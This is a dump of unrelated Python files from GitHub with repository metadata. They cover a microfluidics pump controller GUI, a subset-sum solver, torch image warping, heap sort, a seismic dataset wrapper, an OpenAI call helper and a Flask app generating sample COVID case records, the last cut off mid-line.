self.recursiveIterCheck(iters, v0, self.checkValidValveEntry, ())\r\n v.expression = True\r\n allInt = False\r\n if allInt:\r\n if len(set(valves)) < 3:\r\n raise ValueError(\"There are duplicate valve entries\")\r\n else:\r\n self.recursiveIterCheck(iters, valves, self.checkDuplicateValves, ())\r\n\r\n try:\r\n rate1 = int(rate)\r\n if rate1 < 0:\r\n raise ValueError(rate + \" is not a valid rate for a pump step. Rates must be positive integers.\")\r\n self.rate.expression = False\r\n except:\r\n if not iters:\r\n raise ValueError(rate + \" is not a valid rate for a pump step. Rates must be positive integers.\")\r\n else: #check if valid expression.\r\n self.recursiveIterCheck(iters, rate, self.checkValidRate, ())\r\n self.rate.expression = True\r\n\r\n try:\r\n try:\r\n cycles1 = int(cycles)\r\n except:\r\n if not iters:\r\n raise ValueError(\r\n cycles + \" is not a valid number of cycles for a pump step. The number of cycles must\"\r\n \" be either a positive integer or -1 to pump indefinitely until interupted.\")\r\n else: # check if valid expression\r\n self.recursiveIterCheck(iters, cycles, self.checkValidCycles, ())\r\n self.nCycles.expression = True\r\n Step.saveEntries(self, type=\"int\", iters=iters)\r\n return\r\n\r\n if cycles1 == -1:\r\n if iters:\r\n raise ValueError(\"Pump steps can pump indefinitely only if they\"\r\n \" are the final step in a protocol.\")\r\n else:\r\n if hasattr(self, 'last') and not self.last:\r\n raise ValueError(\"Pump steps can pump indefinitely only if they\"\r\n \" are the final step in a protocol.\")\r\n\r\n\r\n if cycles1 < -1:\r\n if iters:\r\n raise ValueError(\r\n cycles + \" is not a valid number of cycles for a pump step. The number of cycles must be\"\r\n \" a positive integer.\")\r\n else:\r\n raise ValueError(\r\n cycles + \" is not a valid number of cycles for a pump step. The number of cycles must be\"\r\n \" a positive integer, or -1 on the final step of a protocol to pump indefinitely.\")\r\n self.nCycles.expression = False\r\n except ValueError as E:\r\n raise E\r\n\r\n Step.saveEntries(self, type = \"int\", iters = iters)\r\n\r\n # PumpStep.checkValidRate: If pumpstep is in a loop and has an expression entry for rate as a function of the loop\r\n # iteration, checkValidRate checks whether the expression evaluates to a valid rate on the given iteration.\r\n # Input:\r\n # input - Expression for the rate\r\n # i - tuple of iterations for each outer loop. The immediate outer loop is the the first position, the\r\n # outer-most loop is in the last position.\r\n # Output: None, but throws an error if invalid.\r\n def checkValidRate(self, input, i):\r\n try:\r\n rate = eval(input, {}, {'i' : i})\r\n if type(rate) != int or rate < 1:\r\n raise ValueError()\r\n except:\r\n raise ValueError(input + \" is not a valid rate for a pump step. Rates must be positive integers or, in a \"\r\n \"loop, python expressions evaluating to positive integers.\" + self.NestingRuleStatement)\r\n if (type(rate) != int and type(rate) != float) or rate < 0:\r\n raise ValueError(input + \" is not a valid rate for a pump step. Rates must be positive integers or, in a \"\r\n \"loop, python expressions evaluating to positive integers.\" + self.NestingRuleStatement)\r\n\r\n # PumpStep.checkValidCycles: If pumpstep is in a loop and has an expression entry for number of cycles as a function\r\n # of the loop iteration, checkValidCycles checks whether the expression evaluates to a valid number of cycles on\r\n # the given iteration.\r\n # Input:\r\n # input - Expression for the number of cycles\r\n # i - tuple of iterations for each outer loop. The immediate outer loop is the the first position, the\r\n # outer-most loop is in the last position.\r\n # Output: None, but throws an error if invalid.\r\n def checkValidCycles(self, input, i):\r\n try:\r\n cycles = eval(input, {}, {'i' : i})\r\n if type(cycles) != int or cycles < 1:\r\n raise ValueError()\r\n except:\r\n raise ValueError(input + \" is not a valid number of cycles for a pump step. The number of cycles must be\"\r\n \" a positive integer.\")\r\n if cycles == -1:\r\n raise ValueError(\"You cannot pump indefinately inside a loop. \" + input + \" in pump step evaluates to -1 on\"\r\n \" iteration \" + self.iterToString(i) + \".\")\r\n if type(cycles) != int or int < 1:\r\n raise ValueError(\"Number of cycles\" + input + \" evaluates to \" + cycles + \" on iteration \"\r\n + self.iterToString(i) + \". The number of cycles must be a positive integer.\")\r\n\r\n\r\n # PumpStep.specifyPump: Create pump object using a ValveControllerObject. Set upon instantiation of ValveController\r\n # in KATARAGUI.connect.\r\n # Inputs:\r\n # v1 - the first valve in the peristaltic pump\r\n # v2 - the second valve in the peristaltic pump\r\n # v3 - the third valve in the peristaltic pump\r\n # Output:\r\n # returns KATARAPump Object\r\n def specifyPump(self, v1, v2, v3):\r\n raise NotImplementedError(\"Error: Pumpstep.specifyPump must be set upon initialization of the device.\")\r\n\r\n # PumpStep.changeValveColor: Changes the color of the valve button while the pump is running.\r\n # Input:\r\n # color - the color to change the valve button to.\r\n # Output: None\r\n def changeValveColor(self, color):\r\n for v in self.pump.valves:\r\n Step.btndict[int(v)].config(bg=color)\r\n\r\n # PumpStep.cleanup: Resests GUI after finishing pump sequence.\r\n # Inputs: None\r\n # Outputs: None\r\n def cleanup(self): #call this method if a protocol is canceled in the middle of a pump step\r\n self.pump.ctlr.ser.write(\"c\")\r\n self.changeValveColor(\"gray\")\r\n\r\n # PumpStep.run: runs the pump sequence.\r\n # Inputs:\r\n # iters - tuple of loop iterations. None if the step is not inside a loop. The iteration of the immediate loop\r\n # is stored in i[0], the first outer loop in i[1], and the nth outer loop in i[n].\r\n # time - time to pause thread while the pump sequence is running.\r\n # Outputs: None\r\n #def run(self, cleanup = None, iter = None, time = None):\r\n def run(self, iter=None, time=None):\r\n i = iter\r\n\r\n valves = []\r\n for v in self.valveEntries:\r\n if v.expression:\r\n valves.append(eval(v.saved, {}, {'i' : i}))\r\n else:\r\n valves.append(v.saved)\r\n self.pump = self.specifyPump(valves[0], valves[1], valves[2])\r\n ValveController.pPumps.remove(self.pump)\r\n self.changeValveColor(\"Blue\")\r\n if self.nCycles.expression:\r\n nCycles = eval(self.nCycles.saved, {}, {'i' : i})\r\n else:\r\n nCycles = self.nCycles.saved\r\n if self.rate.expression:\r\n rate = eval(self.rate.saved, {}, {'i' : i})\r\n else:\r\n rate = self.rate.saved\r\n self.pump.forward(rate, nCycles)\r\n if nCycles == -1:\r\n Step.pause(self, float('Inf'), cleanup=self.cleanup)\r\n else:\r\n Step.pause(self, float(nCycles)/float(rate), cleanup=self.cleanup)\r\n Step.pause(self, time, cleanup = self.cleanup)\r\n self.changeValveColor(\"gray\")\r\n\r\n # PumpStep.checkValidValveEntry: If PumpStep is in a loop and has an expression entry for a valve as a function\r\n # of the loop iteration, checkValidValve checks whether the expression evaluates to a valid valve on\r\n # the given iteration.\r\n # Input:\r\n # input - Expression for the valve\r\n # i - tuple of iterations for each outer loop. The immediate outer loop is the the first position, the\r\n # outer-most loop is in the last position.\r\n # Output: None, but throws an error if invalid.\r\n def checkValidValveEntry(self, valve, i):\r\n try:\r\n valve = eval(valve, {}, {'i': i})\r\n print(i, valve)\r\n except:\r\n self.checkIfHasi(valve)\r\n raise ValueError(\"Valve entry must either be an available valve or a valid python expression \"\r\n \"evaluating to an available valve. Available valves are \"\r\n + self.btndict[\"AvailablePinsStatement\"] + \". \" + Step.NestingRuleStatement)\r\n if valve not in self.btndict or type(valve) != int or valve < 1:\r\n raise ValueError(\"Valve entry \" + str(valve) + \" evaluates to \" + str(valve) + \" on iteration \"\r\n + self.iterToString(i) + \". Available valves are \" + self.btndict[\r\n \"AvailablePinsStatement\"])\r\n\r\n # PumpStep.checkDuplicateValves: Checks if expressions for valves evaluate to duplicates on a given loop iteration.\r\n # Inputs:\r\n # valves - list of valves to evaluate\r\n # i - the iteration of all outer loops.\r\n # Outputs: None\r\n def checkDuplicateValves(self, valves, i):\r\n evaledValves = []\r\n for v in valves:\r\n evaledValves.append(eval(v, {}, {'i':i}))\r\n if len(set(evaledValves)) < 3:\r\n raise ValueError(\"There are duplicate valves on iteration \" + self.iterToString(i))\r\n\r\n# Pauses a protocol\r\nclass PauseStep(Step):\r\n parameter = \"Pause\"\r\n # PauseStep.__init__: intializes PauseStep\r\n # Input:\r\n # _super - parent Tkinter frame object in which to draw PauseStep instance\r\n # Output: None\r\n def __init__(self, _super): # super is a reference to the procedure holding the item instance\r\n Step.__init__(self, _super)\r\n self.steptype = \"PauseStep\"\r\n self.time = LabelEntry(self.box, 0, 0, \"Time (s):\")\r\n self.time.expression = None\r\n self.entries.append(self.time)\r\n\r\n # PauseStep.saveEntries: Save user entered time value for running or writing to file.\r\n # Inputs:\r\n # type - data types accepted - float for PauseStep\r\n # iters - tuple of loop iterations. None if the step is not inside a loop. The iteration of the immediate loop\r\n # is stored in i[0], the first outer loop in i[1], and the nth outer loop in i[n].\r\n # Output: None\r\n def saveEntries(self, type = \"float\", iters = None):\r\n timeEntry = self.time.get()\r\n if not iters:\r\n time = float(timeEntry)\r\n if time < 0:\r\n raise ValueError(\r\n \"Invalid pause time: \" + self.timeEntry + \"; you cannot pause for a negative amount of time.\")\r\n self.time.expression = False\r\n else:\r\n self.recursiveIterCheck(iters, timeEntry, self.inputCheckForPause, ())\r\n self.time.expression = True\r\n Step.saveEntries(self)\r\n\r\n # PauseStep.inputCheckForPause: If PauseStep is in a loop and has an expression entry for a pause time as a function\r\n # of the loop iteration, inputCheckForPause checks whether the expression evaluates to a valid time on\r\n # the given iteration.\r\n # Input:\r\n # input - Expression for the pause time\r\n # i - tuple of iterations for each outer loop. The immediate outer loop is the the first position, the\r\n # outer-most loop is in the last position.\r\n # Output: None, but throws an error if invalid.\r\n def inputCheckForPause(self, expression, i):\r\n try:\r\n time = eval(expression, {}, {'i' : i})\r\n except:\r\n self.checkIfHasi(expression)\r\n raise ValueError(\"Expression \" + expression + \" in Pause step does not evaluate to a positive float on \"\r\n \"iteration \" + self.iterToString(i) + \".\")\r\n if (type(time) != float and type(time) != int) or time < 0:\r\n raise ValueError(\"Cannot pause for \" + expression + \" seconds on iteration\" + self.iterToString(i)\r\n + \". You can only pause for a positive integer of float number of seconds.\")\r\n\r\n\r\n\r\n # Step.run pauses the protocol. The function is still called run to allow duck typing.\r\n # Input:\r\n # cleanup - function to cleanup after step: None for Step.run\r\n # iter - tuple of the number iterations for each outer loop. The immediate outer loop is the the first\r\n # position, the outer-most loop is in the last position.\r\n # Output: None\r\n def run(self, iter = None):\r\n i = iter\r\n if self.time.expression:\r\n runtime = eval(self.time.saved, {}, {'i' : i})\r\n else:\r\n runtime = self.time.saved\r\n Step.pause(self, runtime)\r\n","repo_name":"jonathanawhite1381/KATARA-Microfluidics-Controller","sub_path":"Code/KATARA_Software/StepDerivatives.py","file_name":"StepDerivatives.py","file_ext":"py","file_size_in_byte":27187,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"5127187389","text":"s = input().split()\nl = len(s)\nfor i in range(l):\n s[i] = int(s[i])\n\nd = int(input())\n\ns.append(d)\nsum = sum(s)\nl = len(s)\n\ntabela = []\nfor i in range(sum//2 + 1):\n tabela.append([])\n for j in range(l + 1):\n tabela[i].append(-1)\n if(i == 0):\n tabela[i][j] = 1\n if(i!=0 and j==0):\n tabela[i][j] = 0\n\nif (sum % 2 == 1):\n print(\"No\")\nelse:\n for i in range(sum//2 + 1):\n tabela[i][0] = 0\n for j in range(l + 1):\n tabela[0][j] = 1\n \n for i in range(1, sum//2 +1):\n for j in range(1, l + 1):\n tabela[i][j] = tabela[i][j-1]\n if(i >= s[j-1]):\n if(tabela[i][j] < tabela[i - s[j-1]][j-1]):\n tabela[i][j] = tabela[ i - s[j-1] ][j-1]\n\n if(tabela[sum//2][l] == 1):\n print(\"Yes\")\n else:\n print(\"No\")\n","repo_name":"LucasSSales/Codigos-de-PAA","sub_path":"Dynamic Programming/Subconjuntos_complementares.py","file_name":"Subconjuntos_complementares.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30894422877","text":"import numpy as np\nimport torch\n\n\n\ndef warping(image, flow):\n\n B, C, H, W = image.size()\n\n\n image_inds = torch.arange(H * W, dtype=torch.int64)\n image_inds = image_inds.repeat(B, 1)\n\n has_flow = torch.sum(torch.abs(flow), dim=1, dtype=torch.bool).view((B, H*W))\n warped_inds = torch.zeros((B, H*W), dtype=torch.int64)\n\n warped_inds[has_flow] += image_inds[has_flow]\n\n flow_ind_shift = torch.tensor((flow[:, 0, :, :] * H + flow[:, 1, :, :]),\n dtype=torch.int64).view(B, H*W)\n warped_inds[has_flow] += flow_ind_shift[has_flow]\n\n\n # batch offset\n offset = torch.cat([torch.ones(H*W, dtype=torch.int64) * H*W*i for i in range(B)]).view((B, H*W))\n warped_inds = torch.flatten(warped_inds + offset)\n image_inds = torch.flatten(image_inds + offset)\n\n warped_im = torch.zeros((B, C, H, W))\n for channel in (0, 1, 2):\n im_channel = torch.flatten(image[:, channel, :, :])\n warped_channel = torch.flatten(warped_im[:, channel, :, :])\n warped_channel[warped_inds] = im_channel[image_inds]\n warped_im[:, channel, :, :] = warped_channel.view((B, H, W))\n\n return warped_im\n\n\n\n\n\nif __name__ == '__main__':\n flow = torch.zeros((5, 2, 10, 10))\n images = torch.zeros((5, 3, 10, 10))\n\n images[:, :, 0, 0] = 1\n flow[:, 0, 0, 0] = 4\n flow[:, 1, 0, 0] = 1\n\n images[:, :, 1, 1] = 3\n flow[:, 0, 1, 1] = 1\n flow[:, 1, 1, 1] = 1\n\n warped_images = warping(images, flow)\n print(warped_images[0, 0, :, :].detach().numpy())\n print(warped_images.max())","repo_name":"alexander-paskal/flowbots","sub_path":"new_warping.py","file_name":"new_warping.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5990626147","text":"#! /usr/bin/env python3\n#\n\nimport sys\n\ndef check_line(n):\n line = sys.stdin.readline().strip('\\n')\n splitted = line.split()\n assert all(s == \"0\" or not s.startswith(\"0\") for s in splitted), \\\n \"leading 0 detected\"\n integers = [int(e) for e in splitted]\n assert len(integers) == n\n for e in integers:\n assert e >= 0\n assert e <= 1000000000\n assert sorted(integers) == integers\n # Check no dups:\n dups = []\n for i in range(len(integers)):\n if i == 0: continue\n if integers[i - 1] == integers[i]: dups.append(integers[i])\n assert len(dups) == 0, 'Dup: %s' % dups\n\n\nif __name__ == '__main__':\n N = int(sys.stdin.readline().strip('\\n'))\n M = int(sys.stdin.readline().strip('\\n'))\n assert N >= 1\n assert N <= 2000\n assert M >= 1\n assert M <= 2000\n check_line(N)\n check_line(M)\n assert len(sys.stdin.readline()) == 0\n sys.exit(42)\n","repo_name":"romeorizzi/SWERC_2_CMS","sub_path":"swerc_original/cakeymccakeface/input_format_validators/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74243200193","text":"# heap.py\n# -*- coding: utf-8 -*-\n\nclass heap:\n '''\n 堆是一棵顺序存储的完全二叉树。\n\n 其中每个结点的关键字都不大于其孩子结点的关键字,这样的堆称为小根堆。\n\n 其中每个结点的关键字都不小于其孩子结点的关键字,这样的堆称为大根堆。\n\n 堆排序\n (1)根据初始数组去构造初始堆(构建一个完全二叉树,保证所有的父结点都比它的孩子结点数值大)。\n\n (2)每次交换第一个和最后一个元素,输出最后一个元素(最大值),然后把剩下元素重新调整为大根堆。\n\n 时间复杂度:平均 nlog(n),最坏 nlog(n),最好 nlog(n),不稳定\n '''\n\n def __init__(self, reverse=False):\n self.reverse = reverse\n\n def swap(self, arr, a, b):\n temp = arr[a]\n arr[a] = arr[b]\n arr[b] = temp\n\n def buildHeap_min(self, arr, i, len):\n # 最小堆的实现\n k = 2 * i + 1\n temp = arr[i]\n while (k < len):\n if k + 1 < len:\n # 从左子节点往右子节点扫描\n if arr[k] > arr[k + 1]:\n k = k + 1\n # 从子节点往父节点扫描,子节点与父节点值替换\n if arr[k] < temp:\n self.swap(arr, i, k)\n i = k\n else:\n break\n k = 2 * k + 1\n\n return arr\n\n def buildHeap_max(self, arr, i, len):\n # 最大堆的实现\n k = 2 * i + 1\n temp = arr[i]\n while (k < len):\n if k + 1 < len:\n if arr[k] < arr[k + 1]:\n k = k + 1\n\n if arr[k] > temp:\n self.swap(arr, i, k)\n i = k\n else:\n break\n k = 2 * k + 1\n\n return arr\n\n def sorted(self, arr):\n\n # 初始化堆,\n for i in range(int(len(arr) / 2) - 1, -1, -1):\n if self.reverse == False:\n self.buildHeap_max(arr, i, len(arr))\n else:\n self.buildHeap_min(arr, i, len(arr))\n\n # 每次循环取出当前堆中最小或最大值,与数组最后一个元素交换\n for j in range(len(arr) - 1, 0, -1):\n\n self.swap(arr, 0, j)\n\n if self.reverse == False:\n self.buildHeap_max(arr, 0, j)\n else:\n self.buildHeap_min(arr, 0, j)\n\n return arr\n\n\nif __name__ == '__main__':\n arr = [7, 2, 3, 10, 4, 40, 2, 10.1, 0, -99, 41, 9]\n m = heap(True)\n re = m.sorted(arr)\n print(re)\n","repo_name":"LDongning/Sorting-Algorithms","sub_path":"heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5141390461","text":"import sys\nimport steamlink\nimport xbmcaddon\n\n# Configure addon\naddon = xbmcaddon.Addon()\n\nif (__name__ == '__main__'):\n if (len(sys.argv) -1 >= 1):\n if (sys.argv[1] == \"update\"):\n steamlink.update(addon)\n else:\n steamlink.launch(addon)","repo_name":"meekys/plugin.program.steamlink","sub_path":"addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35469233245","text":"\"\"\"\nDescription:\n Wrapper Class for providing fast access to data contained within a set of ASDF files\n\nReferences:\n\nCreationDate: 12/12/18\nDeveloper: rakib.hassan@ga.gov.au\n\nRevision History:\n LastUpdate: 12/12/18 RH\n LastUpdate: 2020-04-10 Fei Zhang clean up + added example run for the script\n\"\"\"\n\nfrom collections import defaultdict\n\n# from mpi4py import MPI\nimport numpy as np\nfrom scipy.spatial import cKDTree\n\nfrom seismic.ASDFdatabase._FederatedASDFDataSetImpl import _FederatedASDFDataSetImpl\nfrom seismic.ASDFdatabase.utils import rtp2xyz\n\n\nclass FederatedASDFDataSet():\n def __init__(self, asdf_source, logger=None, single_item_read_limit_in_mb=1024):\n \"\"\"\n Initializer for FederatedASDFDataSet.\n\n :param asdf_source: Path to a text file containing a list of ASDF files. \\\n Entries can be commented out with '#'\n :param logger: logger instance\n \"\"\"\n self.logger = logger\n self.asdf_source = asdf_source\n self._unique_coordinates = None\n self._earth_radius = 6371 # km\n\n # Instantiate implementation class\n self.fds = _FederatedASDFDataSetImpl(asdf_source, logger=logger,\n single_item_read_limit_in_mb=single_item_read_limit_in_mb)\n\n # Populate coordinates\n self._unique_coordinates = defaultdict(list)\n\n rtps_dict = defaultdict()\n for ds_dict in self.fds.asdf_station_coordinates:\n for key in list(ds_dict.keys()):\n self._unique_coordinates[key] = [ds_dict[key][0], ds_dict[key][1]]\n\n rtps_dict[key] = [self._earth_radius,\n np.radians(90 - ds_dict[key][1]),\n np.radians(ds_dict[key][0])]\n # end for\n # end for\n\n rtps_list = []\n for k in list(rtps_dict.keys()):\n rtps_list.append(rtps_dict[k])\n # end for\n rtps = np.array(rtps_list)\n xyzs = rtp2xyz(rtps[:, 0], rtps[:, 1], rtps[:, 2])\n\n self._tree = cKDTree(xyzs)\n self._key_list = np.array(list(rtps_dict.keys()))\n\n # end func\n\n @property\n def unique_coordinates(self):\n \"\"\"\n\n :return: dictionary containing [lon, lat] coordinates indexed by 'net.sta'\n \"\"\"\n return self._unique_coordinates\n\n # end func\n\n def get_closest_stations(self, lon, lat, nn=1):\n \"\"\"\n\n :param lon: longitude (degree)\n :param lat: latitude (degrees)\n :param nn: number of closest stations to fetch\n :return: A tuple containing a list of closest 'network.station' names and a list of distances\n (in ascending order) in kms\n \"\"\"\n assert nn > 0, 'nn must be > 0'\n\n xyz = rtp2xyz(np.array([self._earth_radius]),\n np.array([np.radians(90 - lat)]),\n np.array([np.radians(lon)]))\n d, l = self._tree.query(xyz, nn)\n\n if isinstance(l, int):\n l = [l]\n\n if (len(d.shape) == 1):\n d = np.expand_dims(d, axis=0)\n\n l = l[l < len(self.unique_coordinates)]\n\n if isinstance(l, int):\n l = [l]\n\n return (list(self._key_list[l]), d[0, :len(l)])\n\n # end func\n\n def get_global_time_range(self, network, station, location=None, channel=None):\n \"\"\"\n :param network: network code\n :param station: station code\n :param location: location code (optional)\n :param channel: channel code (optional)\n :return: tuple containing min and max times as UTCDateTime objects. If no matching records are found\n min is set to 2100-01-01T00:00:00.000000Z and max is set to 1900-01-01T00:00:00.000000Z\n \"\"\"\n\n return self.fds.get_global_time_range(network, station, location=location, channel=channel)\n\n # end func\n\n def get_stations(self, starttime, endtime, network=None, station=None, location=None, channel=None):\n \"\"\"\n :param starttime: start time string in UTCDateTime format; can also be an instance of obspy.UTCDateTime\n :param endtime: end time string in UTCDateTime format; can also be an instance of obspy.UTCDateTime\n :param network: network code (optional)\n :param station: station code (optional)\n :param location: location code (optional)\n :param channel: channel code (optional)\n\n :return: a list containing [net, sta, loc, cha, lon, lat] in each row\n \"\"\"\n results = self.fds.get_stations(starttime, endtime, network, station, location, channel)\n return results\n\n # end func\n\n def get_waveform_count(self, network, station, location, channel, starttime,\n endtime):\n \"\"\"\n Count the number of traces within the given parameters of network, station, etc..\n and date range. This is a fast method of determing whether any trace data exists\n in a given time period, if you don't actually need the waveform data itself.\n\n :param network: network code\n :param station: station code\n :param location: location code\n :param channel: channel code\n :param starttime: start time string in UTCDateTime format; can also be an instance of obspy.UTCDateTime\n :param endtime: end time string in UTCDateTime format; can also be an instance of obspy.UTCDateTime\n :return: The number of streams containing waveform data over the time-range provided\n \"\"\"\n return self.fds.get_waveform_count(network, station, location, channel,\n starttime, endtime)\n\n # end func\n\n def get_waveforms(self, network, station, location, channel, starttime,\n endtime, trace_count_threshold=200):\n \"\"\"\n :param network: network code\n :param station: station code\n :param location: location code\n :param channel: channel code\n :param starttime: start time string in UTCDateTime format; can also be an instance of obspy.UTCDateTime\n :param endtime: end time string in UTCDateTime format; can also be an instance of obspy.UTCDateTime\n :param trace_count_threshold: returns an empty Stream if the number of traces within the time-range provided\n exceeds the threshold (default 200). This is particularly useful for filtering\n out data from bad stations, e.g. those from the AU.Schools network\n :return: an obspy.Stream containing waveform data over the time-rage provided\n \"\"\"\n s = self.fds.get_waveforms(network, station, location, channel, starttime,\n endtime, trace_count_threshold)\n return s\n\n # end func\n\n def local_net_sta_list(self):\n \"\"\"\n This function provides an iterator over the entire data volume contained in all the ASDF files listed in the\n text file during instantiation. When FederatedASDFDataSet is instantiated in an MPI-parallel environment,\n meta-data for the entire data volume are equally partitioned over all processors -- in such instances, this\n function provides an iterator over the data allocated to a given processor. This functionality underpins\n parallel operations, e.g. picking arrivals.\n\n :return: tuples containing [net, sta, start_time, end_time]; start- and end-times are instances of obspy.UTCDateTime\n \"\"\"\n for item in self.fds.local_net_sta_list():\n yield item\n # end for\n # end func\n\n\n# end class\n\nif __name__ == \"__main__\":\n \"\"\"\n How to Run Example::\n\n python ASDFdatabase/FederatedASDFDataSet.py /Datasets/asdf_file_index.txt\n\n Upon success, a db file will be created: /Datasets/f374ca9e7dd8abd2a1d58575e0d55520f30ffc23.db\n \"\"\"\n import sys\n from seismic.ASDFdatabase.FederatedASDFDataSet import FederatedASDFDataSet\n\n if len(sys.argv) < 2:\n print(\"******** USAGE: python3 %s %s **********\"% (sys.argv[0], \"asdf_file_list_txt\"))\n sys.exit(1)\n\n asdf_file_list = sys.argv[1]\n ds = FederatedASDFDataSet(asdf_file_list)\n","repo_name":"Ao-Chang/HiperSeis","sub_path":"seismic/ASDFdatabase/FederatedASDFDataSet.py","file_name":"FederatedASDFDataSet.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4187686053","text":"import turtle\r\nwn=turtle.Screen()\r\nt1=turtle.Turtle()\r\ngeo=open(\"geo.txt\",'r')\r\ndist=100\r\nfor line in geo:\r\n\tif line.count('name')>0:\r\n\t\tfname=line[5:]\r\n\telif line.count('go')>0:\r\n\t\tt1.fd(dist)\r\n\telif line.count('right')>0:\r\n\t\tt1.right(int(line[6:]))\r\n\telif line.count('left')>0:\r\n\t\tt1.left(int(line[5:]))\r\n\telif line.count('loc')>0:\r\n\t\tloc=line[4:]\r\n\t\tcountdown=0\r\n\t\tfor word in loc.split():\r\n\t\t\tif countdown%2==0:\r\n\t\t\t\t\tx=int(word)\r\n\t\t\t\t\tcountdown=countdown+1\r\n\t\t\telse:\r\n\t\t\t\t\ty=int(word)\r\n\t\t\t\t\tt1.goto(x,y)\r\n\t\t\t\t\tcountdown=countdown+1\r\ngeo.close()\r\nraw_input()","repo_name":"HeeTa/p1_201611078","sub_path":"w12/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29444510191","text":"import sys\nimport frontend.parser as par\nimport errors\nfrom backend.llvm.translator import translate_program\nfrom backend.llvm.optimizer import optimize_program\n\ndef main():\n c = (len(sys.argv) > 1 and sys.argv[1] == 'c')\n text = ''.join(sys.stdin.readlines())\n\n try:\n program = par.parse(text)\n program.check()\n except errors.CompilerError as err:\n print(f'ERROR\\n{err}\\n', file=sys.stderr)\n exit(1)\n return\n\n if c:\n noopts = (len(sys.argv) > 2 and sys.argv[2] == 'noopts')\n llvm = translate_program(program)\n if not noopts:\n optimize_program(llvm)\n print(llvm)\n else:\n print(f'OK\\n', file=sys.stderr)\n print(program)\n\n exit(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"morch1/latte-compiler","sub_path":"src/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14240173016","text":"import openai\nimport os\nimport subprocess\nimport time\n\n\nOPENAI_API_MODEL = os.getenv('OPENAI_API_MODEL')\nOPENAI_TEMPERATURE = os.getenv('OPENAI_TEMPERATURE')\n\n\ndef get_ada_embedding(text):\n text = text.replace(\"\\n\", \" \")\n return openai.Embedding.create(input=[text], model=\"text-embedding-ada-002\")[\"data\"][0][\"embedding\"]\n\n\ndef openai_call(\n prompt: str,\n model: str = OPENAI_API_MODEL,\n temperature: float = OPENAI_TEMPERATURE,\n max_tokens: int = 200,\n):\n while True:\n try:\n if model.startswith(\"llama\"):\n # Spawn a subprocess to run llama.cpp\n cmd = [\"llama/main\", \"-p\", prompt]\n result = subprocess.run(cmd, shell=True, stderr=subprocess.DEVNULL, stdout=subprocess.PIPE, text=True)\n return result.stdout.strip()\n elif not model.startswith(\"gpt-\"):\n # Use completion API\n response = openai.Completion.create(\n engine=model,\n prompt=prompt,\n temperature=temperature,\n max_tokens=max_tokens,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0,\n )\n return response.choices[0].text.strip()\n else:\n # Use chat completion API\n messages = [{\"role\": \"system\", \"content\": prompt}]\n response = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature,\n max_tokens=max_tokens,\n n=1,\n stop=None,\n )\n return response.choices[0].message.content.strip()\n except openai.error.RateLimitError:\n print(\n \"The OpenAI API rate limit has been exceeded. Waiting 10 seconds and trying again.\"\n )\n time.sleep(10) # Wait 10 seconds and try again\n else:\n break\n","repo_name":"b-chase/toddleragi","sub_path":"ai_responses.py","file_name":"ai_responses.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"2251450890","text":"import math\nfrom collections import Counter\n\ndays= []\ndef solution(progresses, speeds):\n \n for i in range(len(progresses)):\n left = 100 - progresses[i]\n if i == 0 or left / speeds[i] > days[-1]:\n days.append(math.ceil(left / speeds[i]))\n else:\n days.append(days[-1])\n\n answer = list(Counter(days).values())\n return answer","repo_name":"ok701/coding_test","sub_path":"프로그래머스/lv2/42586. 기능개발/기능개발.py","file_name":"기능개발.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3735338283","text":"import flask\nfrom flask import request, jsonify\nimport pandas as pd\nimport numpy as np\nimport time\nimport random\nimport math\n\ndata = pd.read_csv(\"./03-24-2020.csv\")\ndata = data.loc[data[\"Country_Region\"] == \"US\"]\n\ndef gen_response():\n obs = data.sample(200, replace = True, weights = \"Confirmed\")\n obs = obs.replace(np.nan, \"\", regex = True)\n\n current_time = math.floor(time.time())\n start_time = current_time - 1000 * 60 * 5\n\n obs[\"Positive\"] = [\"TRUE\" if random.random() < 0.4 else \"FALSE\" for i in range(200)]\n obs[\"Updated\"] = [random.randint(start_time, current_time) for i in range(200)]\n obs[\"Race\"] = [\"White\" if random.random() < .75 else \"Black\" if random.random() < .6 else \"Asian\" for i in range(200)]\n obs[\"Hispanic\"] = [\"TRUE\" if random.random() < .12 else \"FALSE\" for i in range(200)]\n obs[\"Age\"] = np.floor(np.random.normal(48, 12, 200))\n\n response = {}\n for i in range(200):\n response[i] = {\n \"County\": obs.iloc[i][\"Admin2\"],\n \"State\": obs.iloc[i][\"Province_State\"],\n \"Lat\": obs.iloc[i][\"Lat\"],\n \"Long\": obs.iloc[i][\"Long_\"],\n \"Positive\": obs.iloc[i][\"Positive\"],\n \"Updated\": int(obs.iloc[i][\"Updated\"])\n }\n\n return response\n\napp = flask.Flask(__name__)\n\n@app.route(\"/api\", methods=[\"GET\"])\n\ndef get_json():\n return jsonify({\"response\": gen_response()})\n\nif __name__ == '__main__':\n 